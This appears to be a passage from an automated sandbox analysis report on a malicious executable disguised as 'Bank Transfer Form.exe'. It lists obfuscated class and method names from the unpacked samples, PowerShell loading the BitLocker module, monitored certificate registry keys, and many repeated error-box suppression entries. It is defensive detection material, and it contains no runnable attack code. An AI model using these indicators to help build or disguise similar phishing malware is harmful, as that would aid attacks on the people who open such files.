Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, SqAFRrEyHODwOt21AL.cs	High entropy of concatenated method names: 'CXTUnxre4x', 'YX0U0ywSWh', 'S5wUEILNgQ', 'wqEUIOxlSm', 'w5FUBS96No', 'wfWUgomDRf', 'tQUUFOG15Z', 'gSrURajbD3', 'jIuUcFDORK', 'Qh4UsMo3q3'
Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, L4apYNiLQeObhStfTf.cs	High entropy of concatenated method names: 'RG6CDNOs43', 'qAoCxCWgI5', 'AGvCb4m0wo', 'OvfCiVlWuW', 'XrWCU3oYYx', 'N0BCjORV62', 'Q1qCaRKuHd', 'I7LCAKUWdL', 'MipCwGTrAj', 'JnECeMCPSX'
Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, DikMSDzLh1GP3ebiqj.cs	High entropy of concatenated method names: 'qDrexV8BFw', 'JIwebSbjbZ', 'Svnei2mcnK', 'Y4MePdS9qh', 'n6MeBDxgll', 'DqMeF2Rv5w', 'BYWeRHZbW6', 'I6ee4mJ4C9', 'FCte6f6lSH', 'LjYeSy2JQP'
Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, GOdDuQpxLDLFynigs0.cs	High entropy of concatenated method names: 'hQJrbb9RBt', 'IYkriJrehr', 'NHQrPtUKce', 'w3irBLfbTT', 'E7prFmd3eY', 'gRsrR4dHEM', 'IQCrsBVaQ3', 'vq8rODnL5f', 'MqtrntPDlR', 'ikkro2aybS'
Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, YRJCD4GuTkTB5AFtUh.cs	High entropy of concatenated method names: 'sUteCUKxOF', 'aHYeYIgr7H', 'y6lefvIT1U', 'KWDe2CZ228', 'PZZewcLtKa', 'hnreqRgKGG', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, FyOPAW54oZ0b7HNW4y.cs	High entropy of concatenated method names: 'Dispose', 'U409luscwt', 'rYJkBqMk8m', 'a8al88GfCG', 'hFX9Gb9sHS', 'vgF9zP5qcW', 'ProcessDialogKey', 'iyok7A8ZRt', 'DQ2k9cNhrw', 'gCZkkGRJCD'
Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, WPHP2SbJjmZSALkB5D.cs	High entropy of concatenated method names: 'g0F5EsE8Ix', 'c0K5IoGB8X', 'yRK5tT8JaV', 'Cw95Lv2Rf2', 'n4m58kF2vq', 'uZq5HLNdOo', 'vqB5Vrf27o', 'jSk5WIHugE', 'EOl5lAFs5c', 'W265Gk4CB3'
Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, OrbTnwVH9840uscwtY.cs	High entropy of concatenated method names: 'IIqwU77tpg', 'KqtwaCr0VR', 'ti1wwI3P2W', 'khywdw3Duf', 'mqJw3llEb7', 'Cwow4GQXaq', 'Dispose', 'VZWAhW8Bb3', 'XtAA5gBYG4', 'HIjACjTA6V'
Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, DIv3B497lwTEGfxJNnW.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LdgeoQj9PL', 'Qy8e00HZYo', 'pm3epIkOxU', 'yDIeEhSxhi', 'nBdeILVKnn', 'Vc0etMi0rp', 'MZTeLgZqkr'
Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, GK3rb8Xx6FpRmLh2PZ.cs	High entropy of concatenated method names: 'E8426mT4SH', 'QsQ2SW2wxt', 'UnO2M8H4pW', 'DUp2DdRPyM', 'qEk2vUkFBu', 'gOs2x9bYXE', 'rR22mCUorV', 'JQ02bhcOYC', 'Mft2iulPXg', 'O5D21vpN1J'
Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, sy4xRxkBIgUYZjXBH8.cs	High entropy of concatenated method names: 'FDHMYKxYl', 'SOADinu0w', 'y21xQRAE9', 'vZimVoS0d', 'whTi74ctC', 'JYB1NfXIE', 'kDPevhZdyn7xh0J0RH', 'pnQSHjsS4yxDye4ZZa', 'u7PALJ4ku', 'ydVe0tljk'
Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, cNTAxyLngQ4wmnErdU.cs	High entropy of concatenated method names: 'HHVaKngIer', 'm7jausYccb', 'ToString', 'PlZahnIi2n', 't8sa52aUEV', 'pe2aC3JocW', 'wIdaYy18LW', 'VGbafGUjqg', 'to8a2ORRY4', 'Bjcaq0P3O5'
Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, rSACETqoHL0qafdKnG.cs	High entropy of concatenated method names: 'nkBQJ3iqmP', 'smOQhT0OPC', 'kIoQ5eQBZJ', 'nuVQC7eJgI', 'NInQYXP5cB', 'XEPQfWnMc9', 'U0ZQ25ZRQy', 'rvkQqPXdMW', 'TYQQTMhtK9', 'j59QKhm4Ef'
Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, lg884FPT14t8JDBNJj.cs	High entropy of concatenated method names: 'IBqfJx6MYO', 'cHCf5orYJH', 'F6MfYThPpJ', 'SUTf2aaHO0', 'u5xfqfhXfn', 'wXAY8JZODN', 'MfoYHBfSZj', 'ORQYVKqaCt', 'OOgYWG2TPL', 'ApfYl5w9pu'
Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, fafNrWNPmosQBQ9Hyh.cs	High entropy of concatenated method names: 'T9W92PHP2S', 'ejm9qZSALk', 'dLQ9KeObhS', 'SfT9ufWxS9', 'h9J9UerTg8', 'U4F9jT14t8', 'hryUc55iG5GAVx4FMr', 'hbwGACznxJgtRrXIhn', 'nCK995Y4VY', 'Oq79QxfQnw'
Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, W0luOeHPpUUnD0Gi9F.cs	High entropy of concatenated method names: 'SwjaW25Zr4', 'OZfaGRk12k', 'KNZA7iSVf6', 'IA2A9wvvfb', 'scqaohg2os', 'wtFa03K6PC', 'BZgapUtAA2', 'OC1aE12rG0', 'kF1aIkf2rO', 'R2Fatt9krh'
Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, sIYM2V99T3XKebu3Mfs.cs	High entropy of concatenated method names: 'Ln5eGFQVQw', 'EEiezM3X3G', 'XwXd7VqNCh', 'zMed9CMwsV', 'rRydkFDmSs', 'E8pdQOBm7K', 'sWrdNtgnlu', 'cdXdJ1p2Ey', 'zKRdheKVn6', 'ckad5Z4nNB'
Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, JaYZBb9Noi2bbtHjoAV.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XF5ywKwRrJ', 'hD8yeOFWw8', 'uCQyd08j6L', 'erQyyfb71j', 'pyZy35JuvO', 'yJIyZ7GTmb', 'AsUy4G1o5A'
Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, XxS9LU1e3iUikC9Jer.cs	High entropy of concatenated method names: 'noiYvJ3g4i', 'daAYmUe5HV', 'KJICgbYHZ3', 'ji8CFa0fPf', 'lRmCRtQfvt', 'TisCcV9wHB', 'skRCsp6xyR', 'HmtCOVhdIu', 'kH4CXQDJuU', 'jg7CnaG1ti'
Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, DgcOPfs939iFMF7LnU.cs	High entropy of concatenated method names: 'AME2hBpFvu', 'UyR2C75sWm', 'w8M2fj5Z12', 'nJpfGOBPrU', 'fd3fz8TlJC', 'DXP27Id0Fg', 'hxy29FH72S', 'pZB2kgfDsI', 'iAh2Qi3QiX', 'qTp2N0ZrBK'
Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, OA8ZRtlmQ2cNhrw5CZ.cs	High entropy of concatenated method names: 'YRTwPPVhbe', 'd5WwBytxQ2', 'n3bwglwFvq', 'rqowFkq3Yn', 's0vwRbXecV', 'yNRwcE5kQ4', 'LgVwskrOqf', 'XOvwOo6Nik', 'z5lwXrejEE', 'ppDwnfNKAu'
Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, MA9tcoCn4p8ebb7jyP.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'cRqkl7YYrM', 'aT2kGpEgd6', 'amNkzHMhTM', 'UA4Q74qZwB', 'S1EQ9uQ8K1', 'eExQk2iek6', 'YVKQQqDLj5', 'WyBRQCjIsT01lbOWdIw'
Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, SqAFRrEyHODwOt21AL.cs	High entropy of concatenated method names: 'CXTUnxre4x', 'YX0U0ywSWh', 'S5wUEILNgQ', 'wqEUIOxlSm', 'w5FUBS96No', 'wfWUgomDRf', 'tQUUFOG15Z', 'gSrURajbD3', 'jIuUcFDORK', 'Qh4UsMo3q3'
Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, L4apYNiLQeObhStfTf.cs	High entropy of concatenated method names: 'RG6CDNOs43', 'qAoCxCWgI5', 'AGvCb4m0wo', 'OvfCiVlWuW', 'XrWCU3oYYx', 'N0BCjORV62', 'Q1qCaRKuHd', 'I7LCAKUWdL', 'MipCwGTrAj', 'JnECeMCPSX'
Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, DikMSDzLh1GP3ebiqj.cs	High entropy of concatenated method names: 'qDrexV8BFw', 'JIwebSbjbZ', 'Svnei2mcnK', 'Y4MePdS9qh', 'n6MeBDxgll', 'DqMeF2Rv5w', 'BYWeRHZbW6', 'I6ee4mJ4C9', 'FCte6f6lSH', 'LjYeSy2JQP'
Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, GOdDuQpxLDLFynigs0.cs	High entropy of concatenated method names: 'hQJrbb9RBt', 'IYkriJrehr', 'NHQrPtUKce', 'w3irBLfbTT', 'E7prFmd3eY', 'gRsrR4dHEM', 'IQCrsBVaQ3', 'vq8rODnL5f', 'MqtrntPDlR', 'ikkro2aybS'

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
